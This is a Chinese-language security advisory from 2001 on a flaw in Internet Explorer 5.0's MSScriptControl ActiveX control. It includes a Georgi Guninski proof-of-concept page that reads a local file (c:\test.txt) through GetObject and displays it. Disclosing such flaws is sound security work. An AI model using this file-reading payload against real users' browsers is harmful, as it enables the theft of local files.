IE中的MSScriptControl.ScriptControl存在安全问题发布时间:2001-04-02 更新时间:2001-04-02 严重程度:高 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:客户机模式 受影响系统 MSIE5.0详细描述 "MSScriptControl.ScriptControl" Active 控件和GetObject组合上存在问题,可以导致浏览到有恶意网页设置的站点的IE用户被读任意文件(假如文件名已知)并发送到任意服务器中。 这个漏洞可以还有更严重点的情况,如: C:\Documents and Settings\USERNAME\Local Settings\Temporary Internet Files\Content.IE5\index.dat 问题可以导致执行任意程序。 测试代码 -------------------------------------------------------------------- <html> <h2> Written by Georgi Guninski. <br> Reads c:\test.txt <br> </h2> <script> alert("This script reads C:\\TEST.TXT\nYou may need to create it\n") v=new ActiveXObject("MSScriptControl.ScriptControl.1"); v.Language="VBScript"; x=v.eval('GetObject("c:/test.txt","htmlfile")'); setTimeout("alert(x.body.outerHTML);",2000); </script> </html> -------------------------------------------------------------------- 解决方案 尚无 相关信息 Georgi Guninski http://www.guninski.com发现 |
